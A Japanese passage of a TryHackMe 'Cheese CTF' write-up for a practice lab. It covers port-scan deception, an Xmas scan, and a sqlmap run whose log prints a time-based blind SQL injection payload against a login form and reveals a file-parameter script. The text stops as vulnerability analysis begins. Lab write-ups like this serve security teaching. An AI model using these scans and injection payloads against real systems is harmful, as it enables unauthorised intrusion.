はじめに
本記事はTryHackMeのWriteupです。
RoomはCheese CTF、Difficulty(難易度)はEasyです。
このRoomでは、PHPのfilter chainやsystemctlに関するスキルについて学ぶことができます。
ポートスキャン
はじめにポートスキャンを実行します。
ポートスキャンを実行すると、多くのポートの状態がopenになっていることが確認できます。
出力例
9/tcp open discard
13/tcp open daytime
17/tcp open qotd
19/tcp open chargen
20/tcp open ftp-data
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
24/tcp open priv-mail
25/tcp open smtp
26/tcp open rsftp
30/tcp open unknown
32/tcp open unknown
33/tcp open dsp
37/tcp open time
42/tcp open nameserver
43/tcp open whois
49/tcp open tacacs
53/tcp open domain
70/tcp open gopher
79/tcp open finger
80/tcp open http
81/tcp open hosts2-ns
82/tcp open xfer
83/tcp open mit-ml-dev
84/tcp open ctf
85/tcp open mit-ml-dev
88/tcp open kerberos-sec
89/tcp open su-mit-tg
90/tcp open dnsix
99/tcp open metagram
100/tcp open newacct
106/tcp open pop3pw
109/tcp open pop2
110/tcp open pop3
111/tcp open rpcbind
113/tcp open ident
119/tcp open nntp
125/tcp open locus-map
135/tcp open msrpc
139/tcp open netbios-ssn
143/tcp open imap
144/tcp open news
146/tcp open iso-tp0
161/tcp open snmp
163/tcp open cmip-man
179/tcp open bgp
199/tcp open smux
211/tcp open 914c-g
212/tcp open anet
222/tcp open rsh-spx
254/tcp open unknown
255/tcp open unknown
256/tcp open fw1-secureremote
259/tcp open esro-gen
264/tcp open bgmp
280/tcp open http-mgmt
301/tcp open unknown
306/tcp open unknown
311/tcp open asip-webadmin
340/tcp open unknown
366/tcp open odmr
389/tcp open ldap
406/tcp open imsp
407/tcp open timbuktu
416/tcp open silverplatter
417/tcp open onmux
425/tcp open icad-el
427/tcp open svrloc
443/tcp open https
444/tcp open snpp
445/tcp open microsoft-ds
458/tcp open appleqtc
464/tcp open kpasswd5
465/tcp open smtps
481/tcp open dvs
497/tcp open retrospect
500/tcp open isakmp
512/tcp open exec
513/tcp open login
514/tcp open shell
515/tcp open printer
524/tcp open ncp
541/tcp open uucp-rlogin
543/tcp open klogin
544/tcp open kshell
545/tcp open ekshell
548/tcp open afp
554/tcp open rtsp
555/tcp open dsf
563/tcp open snews
587/tcp open submission
593/tcp open http-rpc-epmap
616/tcp open sco-sysmgr
617/tcp open sco-dtmgr
625/tcp open apple-xsrvr-admin
631/tcp open ipp
636/tcp open ldapssl
646/tcp open ldp
648/tcp open rrp
666/tcp open doom
667/tcp open disclose
668/tcp open mecomm
683/tcp open corba-iiop
687/tcp open asipregistry
691/tcp open resvc
700/tcp open epp
705/tcp open agentx
711/tcp open cisco-tdp
714/tcp open iris-xpcs
720/tcp open unknown
722/tcp open unknown
726/tcp open unknown
749/tcp open kerberos-adm
765/tcp open webster
777/tcp open multiling-http
783/tcp open spamassassin
787/tcp open qsc
800/tcp open mdbs_daemon
801/tcp open device
808/tcp open ccproxy-http
843/tcp open unknown
873/tcp open rsync
880/tcp open unknown
888/tcp open accessbuilder
898/tcp open sun-manageconsole
900/tcp open omginitialrefs
901/tcp open samba-swat
902/tcp open iss-realsecure
903/tcp open iss-console-mgr
911/tcp open xact-backup
912/tcp open apex-mesh
981/tcp open unknown
987/tcp open unknown
990/tcp open ftps
992/tcp open telnets
993/tcp open imaps
995/tcp open pop3s
999/tcp open garcon
1000/tcp open cadlock
1001/tcp open webpush
1002/tcp open windows-icfw
1007/tcp open unknown
1009/tcp open unknown
1010/tcp open surf
1011/tcp open unknown
1021/tcp open exp1
1022/tcp open exp2
1023/tcp open netvenuechat
1024/tcp open kdm
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1028/tcp open unknown
1029/tcp open ms-lsa
1030/tcp open iad1
1031/tcp open iad2
1032/tcp open iad3
1033/tcp open netinfo
1034/tcp open zincite-a
1035/tcp open multidropper
1036/tcp open nsstp
1037/tcp open ams
1038/tcp open mtqp
1039/tcp open sbl
1040/tcp open netsaint
1041/tcp open danf-ak2
1042/tcp open afrog
1043/tcp open boinc
1044/tcp open dcutility
1045/tcp open fpitp
1046/tcp open wfremotertm
1047/tcp open neod1
1048/tcp open neod2
1049/tcp open td-postman
1050/tcp open java-or-OTGfileshare
1051/tcp open optima-vnet
1052/tcp open ddt
1053/tcp open remote-as
1054/tcp open brvread
1055/tcp open ansyslmd
1056/tcp open vfo
1057/tcp open startron
1058/tcp open nim
1059/tcp open nimreg
1060/tcp open polestar
1061/tcp open kiosk
1062/tcp open veracity
1063/tcp open kyoceranetdev
1064/tcp open jstel
1065/tcp open syscomlan
1066/tcp open fpo-fns
1067/tcp open instl_boots
1068/tcp open instl_bootc
1069/tcp open cognex-insight
1070/tcp open gmrupdateserv
1071/tcp open bsquare-voip
1072/tcp open cardax
1073/tcp open bridgecontrol
1074/tcp open warmspotMgmt
1075/tcp open rdrmshc
1076/tcp open sns_credit
1077/tcp open imgames
1078/tcp open avocent-proxy
1079/tcp open asprovatalk
1080/tcp open socks
1081/tcp open pvuniwien
1082/tcp open amt-esd-prot
1083/tcp open ansoft-lm-1
1084/tcp open ansoft-lm-2
1085/tcp open webobjects
1086/tcp open cplscrambler-lg
1087/tcp open cplscrambler-in
1088/tcp open cplscrambler-al
1089/tcp open ff-annunc
1090/tcp open ff-fms
1091/tcp open ff-sm
1092/tcp open obrpd
1093/tcp open proofd
1094/tcp open rootd
1095/tcp open nicelink
1096/tcp open cnrprotocol
1097/tcp open sunclustermgr
1098/tcp open rmiactivation
1099/tcp open rmiregistry
1100/tcp open mctp
1102/tcp open adobeserver-1
1104/tcp open xrl
1105/tcp open ftranhc
1106/tcp open isoipsigport-1
1107/tcp open isoipsigport-2
1108/tcp open ratio-adp
1110/tcp open nfsd-status
1111/tcp open lmsocialserver
1112/tcp open msql
1113/tcp open ltp-deepspace
1114/tcp open mini-sql
1117/tcp open ardus-mtrns
1119/tcp open bnetgame
1121/tcp open rmpp
1122/tcp open availant-mgr
1123/tcp open murray
1124/tcp open hpvmmcontrol
1126/tcp open hpvmmdata
1130/tcp open casp
1131/tcp open caspssl
1132/tcp open kvm-via-ip
1137/tcp open trim
1138/tcp open encrypted_admin
1141/tcp open mxomss
1145/tcp open x9-icue
1147/tcp open capioverlan
1148/tcp open elfiq-repl
1149/tcp open bvtsonar
1151/tcp open unizensus
1152/tcp open winpoplanmess
1154/tcp open resacommunity
1163/tcp open sddp
1164/tcp open qsm-proxy
1165/tcp open qsm-gui
1166/tcp open qsm-remote
1169/tcp open tripwire
1174/tcp open fnet-remote-ui
1175/tcp open dossier
1183/tcp open llsurfup-http
1185/tcp open catchpole
1186/tcp open mysql-cluster
1187/tcp open alias
1192/tcp open caids-sensor
1198/tcp open cajo-discovery
1199/tcp open dmidi
1201/tcp open nucleus-sand
1213/tcp open mpc-lifenet
1216/tcp open etebac5
1217/tcp open hpss-ndapi
1218/tcp open aeroflight-ads
1233/tcp open univ-appserver
1234/tcp open hotline
1236/tcp open bvcontrol
1244/tcp open isbconference1
1247/tcp open visionpyramid
1248/tcp open hermes
1259/tcp open opennl-voice
1271/tcp open excw
1272/tcp open cspmlockmgr
1277/tcp open miva-mqs
1287/tcp open routematch
1296/tcp open dproxy
1300/tcp open h323hostcallsc
1301/tcp open ci3-software-1
1309/tcp open jtag-server
1310/tcp open husky
1311/tcp open rxmon
1322/tcp open novation
1328/tcp open ewall
1334/tcp open writesrv
1352/tcp open lotusnotes
1417/tcp open timbuktu-srv1
1433/tcp open ms-sql-s
1434/tcp open ms-sql-m
1443/tcp open ies-lm
1455/tcp open esl-lm
1461/tcp open ibm_wrless_lan
1494/tcp open citrix-ica
1500/tcp open vlsi-lm
1501/tcp open sas-3
1503/tcp open imtc-mcs
1521/tcp open oracle
1524/tcp open ingreslock
1533/tcp open virtual-places
1556/tcp open veritas_pbx
1580/tcp open tn-tl-r1
1583/tcp open simbaexpress
1594/tcp open sixtrak
1600/tcp open issd
1641/tcp open invision
1658/tcp open sixnetudr
1666/tcp open netview-aix-6
1687/tcp open nsjtp-ctrl
1688/tcp open nsjtp-data
1700/tcp open mps-raft
1717/tcp open fj-hdnet
1718/tcp open h323gatedisc
1719/tcp open h323gatestat
1720/tcp open h323q931
1721/tcp open caicci
1723/tcp open pptp
1755/tcp open wms
1761/tcp open landesk-rc
1782/tcp open hp-hcip
1783/tcp open unknown
1801/tcp open msmq
1805/tcp open enl-name
1812/tcp open radius
1839/tcp open netopia-vo1
1840/tcp open netopia-vo2
1862/tcp open mysql-cm-agent
1863/tcp open msnp
1864/tcp open paradym-31
1875/tcp open westell-stats
1900/tcp open upnp
1914/tcp open elm-momentum
1935/tcp open rtmp
1947/tcp open sentinelsrm
1971/tcp open netop-school
1972/tcp open intersys-cache
1974/tcp open drp
1984/tcp open bigbrother
1998/tcp open x25-svc-port
1999/tcp open tcp-id-port
2000/tcp open cisco-sccp
2001/tcp open dc
2002/tcp open globe
2003/tcp open finger
2004/tcp open mailbox
2005/tcp open deslogin
2006/tcp open invokator
2007/tcp open dectalk
2008/tcp open conf
2009/tcp open news
2010/tcp open search
2013/tcp open raid-am
2020/tcp open xinupageserver
2021/tcp open servexec
2022/tcp open down
2030/tcp open device2
2033/tcp open glogger
2034/tcp open scoremgr
2035/tcp open imsldoc
2038/tcp open objectmanager
2040/tcp open lam
2041/tcp open interbase
2042/tcp open isis
2043/tcp open isis-bcast
2045/tcp open cdfunc
2046/tcp open sdfunc
2047/tcp open dls
2048/tcp open dls-monitor
2049/tcp open nfs
2065/tcp open dlsrpn
2068/tcp open avocentkvm
2099/tcp open h2250-annex-g
2100/tcp open amiganetfs
2103/tcp open zephyr-clt
2105/tcp open eklogin
2106/tcp open ekshell
2107/tcp open msmq-mgmt
2111/tcp open kx
2119/tcp open gsigatekeeper
2121/tcp open ccproxy-ftp
2126/tcp open pktcable-cops
2135/tcp open gris
2144/tcp open lv-ffx
2160/tcp open apc-2160
2161/tcp open apc-agent
2170/tcp open eyetv
2179/tcp open vmrdp
2190/tcp open tivoconnect
2191/tcp open tvbus
2196/tcp open unknown
2200/tcp open ici
2222/tcp open EtherNetIP-1
2251/tcp open dif-port
2260/tcp open apc-2260
2288/tcp open netml
2301/tcp open compaqdiag
2323/tcp open 3d-nfsd
2366/tcp open qip-login
2381/tcp open compaq-https
2382/tcp open ms-olap3
2383/tcp open ms-olap4
2393/tcp open ms-olap1
2394/tcp open ms-olap2
2399/tcp open fmpro-fdal
2401/tcp open cvspserver
2492/tcp open groove
2500/tcp open rtsserv
2522/tcp open windb
2525/tcp open ms-v-worlds
2557/tcp open nicetec-mgmt
2601/tcp open zebra
2602/tcp open ripd
2604/tcp open ospfd
2605/tcp open bgpd
2607/tcp open connection
2608/tcp open wag-service
2638/tcp open sybase
2701/tcp open sms-rcinfo
2702/tcp open sms-xfer
2710/tcp open sso-service
2717/tcp open pn-requester
2718/tcp open pn-requester2
2725/tcp open msolap-ptp2
2800/tcp open acc-raid
2809/tcp open corbaloc
2811/tcp open gsiftp
2869/tcp open icslap
2875/tcp open dxmessagebase2
2909/tcp open funk-dialout
2910/tcp open tdaccess
2920/tcp open roboeda
2967/tcp open symantec-av
2968/tcp open enpp
2998/tcp open iss-realsec
3000/tcp open ppp
3001/tcp open nessus
3003/tcp open cgms
3005/tcp open deslogin
3006/tcp open deslogind
3007/tcp open lotusmtap
3011/tcp open trusted-web
3013/tcp open gilatskysurfer
3017/tcp open event_listener
3030/tcp open arepa-cas
3031/tcp open eppc
3052/tcp open powerchute
3071/tcp open csd-mgmt-port
3077/tcp open orbix-loc-ssl
3128/tcp open squid-http
3168/tcp open poweronnud
3211/tcp open avsecuremgmt
3221/tcp open xnm-clear-text
3260/tcp open iscsi
3261/tcp open winshadow
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3283/tcp open netassistant
3300/tcp open ceph
3301/tcp open tarantool
3306/tcp open mysql
3322/tcp open active-net
3323/tcp open active-net
3324/tcp open active-net
3325/tcp open active-net
3333/tcp open dec-notes
3351/tcp open btrieve
3367/tcp open satvid-datalnk
3369/tcp open satvid-datalnk
3370/tcp open satvid-datalnk
3371/tcp open satvid-datalnk
3372/tcp open msdtc
3389/tcp open ms-wbt-server
3390/tcp open dsc
3404/tcp open unknown
3476/tcp open nppmp
3493/tcp open nut
3517/tcp open 802-11-iapp
3527/tcp open beserver-msg-q
3546/tcp open unknown
3551/tcp open apcupsd
3580/tcp open nati-svrloc
3659/tcp open apple-sasl
3689/tcp open rendezvous
3690/tcp open svn
3703/tcp open adobeserver-3
3737/tcp open xpanel
3766/tcp open sitewatch-s
3784/tcp open bfd-control
3800/tcp open pwgpsi
3801/tcp open ibm-mgr
3809/tcp open apocd
3814/tcp open neto-dcs
3826/tcp open wormux
3827/tcp open netmpi
3828/tcp open neteh
3851/tcp open spectraport
3869/tcp open ovsam-mgmt
3871/tcp open avocent-adsap
3878/tcp open fotogcad
3880/tcp open igrs
3889/tcp open dandv-tester
3905/tcp open mupdate
3914/tcp open listcrt-port-2
3918/tcp open pktcablemmcops
3920/tcp open exasoftport1
3945/tcp open emcads
3971/tcp open lanrevserver
3986/tcp open mapper-ws_ethd
3995/tcp open iss-mgmt-ssl
3998/tcp open dnx
4000/tcp open remoteanything
4001/tcp open newoak
4002/tcp open mlchat-proxy
4003/tcp open pxc-splr-ft
4004/tcp open pxc-roid
4005/tcp open pxc-pin
4006/tcp open pxc-spvr
4045/tcp open lockd
4111/tcp open xgrid
4125/tcp open rww
4126/tcp open ddrepl
4129/tcp open nuauth
4224/tcp open xtell
4242/tcp open vrml-multi-use
4279/tcp open vrml-multi-use
4321/tcp open rwhois
4343/tcp open unicall
4443/tcp open pharos
4444/tcp open krb524
4445/tcp open upnotifyp
4446/tcp open n1-fwp
4449/tcp open privatewire
4550/tcp open gds-adppiw-db
4567/tcp open tram
4662/tcp open edonkey
4848/tcp open appserv-http
4899/tcp open radmin
4900/tcp open hfcs
4998/tcp open maybe-veritas
5000/tcp open upnp
5001/tcp open commplex-link
5002/tcp open rfe
5003/tcp open filemaker
5004/tcp open avt-profile-1
5009/tcp open airport-admin
5030/tcp open surfpass
5033/tcp open jtnetd-server
5050/tcp open mmcc
5051/tcp open ida-agent
5054/tcp open rlm-admin
5060/tcp open sip
5061/tcp open sip-tls
5080/tcp open onscreen
5087/tcp open biotic
5100/tcp open admd
5101/tcp open admdog
5102/tcp open admeng
5120/tcp open barracuda-bbs
5190/tcp open aol
5200/tcp open targus-getdata
5214/tcp open unknown
5221/tcp open 3exmp
5222/tcp open xmpp-client
5225/tcp open hp-server
5226/tcp open hp-status
5269/tcp open xmpp-server
5280/tcp open xmpp-bosh
5298/tcp open presence
5357/tcp open wsdapi
5405/tcp open pcduo
5414/tcp open statusd
5431/tcp open park-agent
5432/tcp open postgresql
5440/tcp open unknown
5500/tcp open hotline
5510/tcp open secureidprop
5544/tcp open unknown
5550/tcp open sdadmind
5555/tcp open freeciv
5560/tcp open isqlplus
5566/tcp open westec-connect
5631/tcp open pcanywheredata
5633/tcp open beorl
5666/tcp open nrpe
5678/tcp open rrac
5679/tcp open activesync
5718/tcp open dpm
5730/tcp open unieng
5800/tcp open vnc-http
5801/tcp open vnc-http-1
5802/tcp open vnc-http-2
5810/tcp open unknown
5811/tcp open unknown
5815/tcp open unknown
5822/tcp open unknown
5825/tcp open unknown
5850/tcp open unknown
5859/tcp open wherehoo
5862/tcp open unknown
5877/tcp open unknown
5900/tcp open vnc
5901/tcp open vnc-1
5902/tcp open vnc-2
5903/tcp open vnc-3
5904/tcp open ag-swim
5906/tcp open rpas-c2
5907/tcp open dsd
5910/tcp open cm
5911/tcp open cpdlc
5915/tcp open unknown
5922/tcp open unknown
5925/tcp open unknown
5950/tcp open unknown
5952/tcp open unknown
5959/tcp open unknown
5960/tcp open unknown
5961/tcp open unknown
5962/tcp open unknown
5963/tcp open indy
5987/tcp open wbem-rmi
5988/tcp open wbem-http
5989/tcp open wbem-https
5998/tcp open ncd-diag
5999/tcp open ncd-conf
6000/tcp open X11
6001/tcp open X11:1
6002/tcp open X11:2
6003/tcp open X11:3
6004/tcp open X11:4
6005/tcp open X11:5
6006/tcp open X11:6
6007/tcp open X11:7
6009/tcp open X11:9
6025/tcp open x11
6059/tcp open X11:59
6100/tcp open synchronet-db
6101/tcp open backupexec
6106/tcp open isdninfo
6112/tcp open dtspc
6123/tcp open backup-express
6129/tcp open unknown
6156/tcp open unknown
6346/tcp open gnutella
6389/tcp open clariion-evr01
6502/tcp open netop-rc
6510/tcp open mcer-port
6543/tcp open mythtv
6547/tcp open powerchuteplus
6565/tcp open unknown
6566/tcp open sane-port
6567/tcp open esp
6580/tcp open parsec-master
6646/tcp open unknown
6666/tcp open irc
6667/tcp open irc
6668/tcp open irc
6669/tcp open irc
6689/tcp open tsa
6692/tcp open unknown
6699/tcp open napster
6779/tcp open unknown
6788/tcp open smc-http
6789/tcp open ibm-db2-admin
6792/tcp open unknown
6839/tcp open unknown
6881/tcp open bittorrent-tracker
6901/tcp open jetstream
6969/tcp open acmsoda
7000/tcp open afs3-fileserver
7001/tcp open afs3-callback
7002/tcp open afs3-prserver
7004/tcp open afs3-kaserver
7007/tcp open afs3-bos
7019/tcp open doceri-ctl
7025/tcp open vmsvc-2
7070/tcp open realserver
7100/tcp open font-service
7103/tcp open unknown
7106/tcp open unknown
7200/tcp open fodms
7201/tcp open dlip
7402/tcp open rtps-dd-mt
7435/tcp open unknown
7443/tcp open oracleas-https
7496/tcp open unknown
7512/tcp open unknown
7625/tcp open unknown
7627/tcp open soap-http
7676/tcp open imqbrokerd
7741/tcp open scriptview
7777/tcp open cbt
7778/tcp open interwise
7800/tcp open asr
7911/tcp open unknown
7920/tcp open unknown
7921/tcp open unknown
7937/tcp open nsrexecd
7938/tcp open lgtomapper
7999/tcp open irdmi2
8000/tcp open http-alt
8001/tcp open vcom-tunnel
8002/tcp open teradataordbms
8007/tcp open ajp12
8008/tcp open http
8009/tcp open ajp13
8010/tcp open xmpp
8011/tcp open unknown
8021/tcp open ftp-proxy
8022/tcp open oa-system
8031/tcp open unknown
8042/tcp open fs-agent
8045/tcp open unknown
8080/tcp open http-proxy
8081/tcp open blackice-icecap
8082/tcp open blackice-alerts
8083/tcp open us-srv
8084/tcp open websnp
8085/tcp open unknown
8086/tcp open d-s-n
8087/tcp open simplifymedia
8088/tcp open radan-http
8089/tcp open unknown
8090/tcp open opsmessaging
8093/tcp open unknown
8099/tcp open unknown
8100/tcp open xprint-server
8180/tcp open unknown
8181/tcp open intermapper
8192/tcp open sophos
8193/tcp open sophos
8194/tcp open sophos
8200/tcp open trivnet1
8222/tcp open unknown
8254/tcp open unknown
8290/tcp open unknown
8291/tcp open unknown
8292/tcp open blp3
8300/tcp open tmi
8333/tcp open bitcoin
8383/tcp open m2mservices
8400/tcp open cvd
8402/tcp open abarsd
8443/tcp open https-alt
8500/tcp open fmtp
8600/tcp open asterix
8649/tcp open unknown
8651/tcp open unknown
8652/tcp open unknown
8654/tcp open unknown
8701/tcp open unknown
8800/tcp open sunwebadmin
8873/tcp open dxspider
8888/tcp open sun-answerbook
8899/tcp open ospf-lite
8994/tcp open unknown
9000/tcp open cslistener
9001/tcp open tor-orport
9002/tcp open dynamid
9003/tcp open unknown
9009/tcp open pichat
9010/tcp open sdr
9011/tcp open d-star
9040/tcp open tor-trans
9050/tcp open tor-socks
9071/tcp open unknown
9080/tcp open glrpc
9081/tcp open cisco-aqos
9090/tcp open zeus-admin
9091/tcp open xmltec-xmlmail
9099/tcp open unknown
9100/tcp open jetdirect
9101/tcp open jetdirect
9102/tcp open jetdirect
9103/tcp open jetdirect
9110/tcp open unknown
9111/tcp open DragonIDSConsole
9200/tcp open wap-wsp
9207/tcp open wap-vcal-s
9220/tcp open unknown
9290/tcp open unknown
9415/tcp open unknown
9418/tcp open git
9485/tcp open unknown
9500/tcp open ismserver
9502/tcp open unknown
9503/tcp open unknown
9535/tcp open man
9575/tcp open unknown
9593/tcp open cba8
9594/tcp open msgsys
9595/tcp open pds
9618/tcp open condor
9666/tcp open zoomcp
9876/tcp open sd
9877/tcp open x510
9878/tcp open kca-service
9898/tcp open monkeycom
9900/tcp open iua
9917/tcp open unknown
9929/tcp open nping-echo
9943/tcp open unknown
9944/tcp open unknown
9968/tcp open unknown
9998/tcp open distinct32
9999/tcp open abyss
10000/tcp open snet-sensor-mgmt
10001/tcp open scp-config
10002/tcp open documentum
10003/tcp open documentum_s
10004/tcp open emcrmirccd
10009/tcp open swdtp-sv
10010/tcp open rxapi
10012/tcp open unknown
10024/tcp open unknown
10025/tcp open unknown
10082/tcp open amandaidx
10180/tcp open unknown
10215/tcp open unknown
10243/tcp open unknown
10566/tcp open unknown
10616/tcp open unknown
10617/tcp open unknown
10621/tcp open unknown
10626/tcp open unknown
10628/tcp open unknown
10629/tcp open unknown
10778/tcp open unknown
11110/tcp open sgi-soap
11111/tcp open vce
11967/tcp open sysinfo-sp
12000/tcp open cce4x
12174/tcp open unknown
12265/tcp open unknown
12345/tcp open netbus
13456/tcp open unknown
13722/tcp open netbackup
13782/tcp open netbackup
13783/tcp open netbackup
14000/tcp open scotty-ft
14238/tcp open unknown
14441/tcp open unknown
14442/tcp open unknown
15000/tcp open hydap
15002/tcp open onep-tls
15003/tcp open unknown
15004/tcp open unknown
15660/tcp open bex-xr
15742/tcp open unknown
16000/tcp open fmsas
16001/tcp open fmsascon
16012/tcp open unknown
16016/tcp open unknown
16018/tcp open unknown
16080/tcp open osxwebadmin
16113/tcp open unknown
16992/tcp open amt-soap-http
16993/tcp open amt-soap-https
17877/tcp open unknown
17988/tcp open unknown
18040/tcp open unknown
18101/tcp open unknown
18988/tcp open unknown
19101/tcp open unknown
19283/tcp open keysrvr
19315/tcp open keyshadow
19350/tcp open unknown
19780/tcp open unknown
19801/tcp open unknown
19842/tcp open unknown
20000/tcp open dnp
20005/tcp open btx
20031/tcp open unknown
20221/tcp open unknown
20222/tcp open ipulse-ics
20828/tcp open unknown
21571/tcp open unknown
22939/tcp open unknown
23502/tcp open unknown
24444/tcp open unknown
24800/tcp open unknown
25734/tcp open unknown
25735/tcp open unknown
26214/tcp open unknown
27000/tcp open flexlm0
27352/tcp open unknown
27353/tcp open unknown
27355/tcp open unknown
27356/tcp open unknown
27715/tcp open unknown
28201/tcp open unknown
30000/tcp open ndmps
30718/tcp open unknown
30951/tcp open unknown
31038/tcp open unknown
31337/tcp open Elite
32768/tcp open filenet-tms
32769/tcp open filenet-rpc
32770/tcp open sometimes-rpc3
32771/tcp open sometimes-rpc5
32772/tcp open sometimes-rpc7
32773/tcp open sometimes-rpc9
32774/tcp open sometimes-rpc11
32775/tcp open sometimes-rpc13
32776/tcp open sometimes-rpc15
32777/tcp open sometimes-rpc17
32778/tcp open sometimes-rpc19
32779/tcp open sometimes-rpc21
32780/tcp open sometimes-rpc23
32781/tcp open unknown
32782/tcp open unknown
32783/tcp open unknown
32784/tcp open unknown
32785/tcp open unknown
33354/tcp open unknown
33899/tcp open unknown
34571/tcp open unknown
34572/tcp open unknown
34573/tcp open unknown
35500/tcp open unknown
38292/tcp open landesk-cba
40193/tcp open unknown
40911/tcp open unknown
41511/tcp open unknown
42510/tcp open caerpc
44176/tcp open unknown
44442/tcp open coldfusion-auth
44443/tcp open coldfusion-auth
44501/tcp open unknown
45100/tcp open unknown
48080/tcp open unknown
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49159/tcp open unknown
49160/tcp open unknown
49161/tcp open unknown
49163/tcp open unknown
49165/tcp open unknown
49167/tcp open unknown
49175/tcp open unknown
49176/tcp open unknown
49400/tcp open compaqdiag
49999/tcp open unknown
50000/tcp open ibm-db2
50001/tcp open unknown
50002/tcp open iiimsf
50003/tcp open unknown
50006/tcp open unknown
50300/tcp open unknown
50389/tcp open unknown
50500/tcp open unknown
50636/tcp open unknown
50800/tcp open unknown
51103/tcp open unknown
51493/tcp open unknown
52673/tcp open unknown
52822/tcp open unknown
52848/tcp open unknown
52869/tcp open unknown
54045/tcp open unknown
54328/tcp open unknown
55055/tcp open unknown
55056/tcp open unknown
55555/tcp open unknown
55600/tcp open unknown
56737/tcp open unknown
56738/tcp open unknown
57294/tcp open unknown
57797/tcp open unknown
58080/tcp open unknown
60020/tcp open unknown
60443/tcp open unknown
61532/tcp open unknown
61900/tcp open unknown
62078/tcp open iphone-sync
63331/tcp open unknown
64623/tcp open unknown
64680/tcp open unknown
65000/tcp open unknown
65129/tcp open unknown
65389/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 16.63 seconds
上記結果を踏まえて、SYN/ACKを返していることから、何らかのポートスキャン対策を実装していると考えられます。
対応として-sX
オプションを付与して、クリスマススキャンを実行します。
$ sudo nmap -sX <IP address>
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-25 20:31 JST
Nmap scan report for 10.10.123.5
Host is up (0.26s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open|filtered ssh
80/tcp open|filtered http
4444/tcp open|filtered krb524
Nmap done: 1 IP address (1 host up) scanned in 12.85 seconds
クリスマススキャン実行後、適切なポートスキャンの結果が得られました。
列挙
ポートスキャンの結果を踏まえて、80番ポートにアクセスすると、以下の様な画面が表示されます。
Loginページの存在が確認できます。
sqlmap
Loginページを調査するにあたって、sqlmapを使用します。
sqlmapを使用するためには、Burp Suiteを実行して、Loginページに対するリクエストをインターセプトしたデータを使用します。
$ sqlmap -r login.req http://<IP address>
___
__H__
___ ___[']_____ ___ ___ {1.8.8#stable}
|_ -| . [.] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:52:13 /2024-10-25/
[20:52:13] [INFO] parsing HTTP request from 'login.req'
[20:52:14] [INFO] testing connection to the target URL
[20:52:14] [INFO] testing if the target URL content is stable
[20:52:14] [INFO] target URL content is stable
[20:52:14] [INFO] testing if POST parameter 'username' is dynamic
[20:52:15] [WARNING] POST parameter 'username' does not appear to be dynamic
[20:52:15] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable
[20:52:15] [INFO] testing for SQL injection on POST parameter 'username'
[20:52:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:52:17] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[20:52:17] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[20:52:19] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:52:21] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[20:52:22] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:52:24] [INFO] testing 'Generic inline queries'
[20:52:25] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:52:26] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:52:28] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:52:29] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:52:41] [INFO] POST parameter 'username' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[20:52:44] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:52:44] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
got a 302 redirect to 'http://10.10.123.5/secret-script.php?file=supersecretadminpanel.html'. Do you want to follow? [Y/n]
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N]
[20:52:57] [INFO] target URL appears to be UNION injectable with 3 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[20:53:16] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[20:53:16] [INFO] checking if the injection point on POST parameter 'username' is a false positive
sqlmap identified the following injection point(s) with a total of 96 HTTP(s) requests:
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 8078 FROM (SELECT(SLEEP(5)))pbJi) AND 'KNhW'='KNhW&password=1
---
[20:54:34] [INFO] the back-end DBMS is MySQL
[20:54:34] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[20:54:34] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
web server operating system: Linux Ubuntu 20.04 or 20.10 or 19.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:54:40] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.10.123.5'
[*] ending @ 20:54:40 /2024-10-25/
sqlmapの結果よりhttp://10.10.123.5/secret-script.php?file=supersecretadminpanel.html
ページへのリダイレクトを検出しました。
secret-script.php?file=supersecretadminpanel.html
ページについては、SQLインジェクションを行うことでも同じ結果が得られます。
脆弱性分析
sqlmapの結果を踏まえて、http://10.10.123.5/secret-script.php?file=supersecretadminpanel.html
にアクセスすると、以下の様な画面が表示されます。
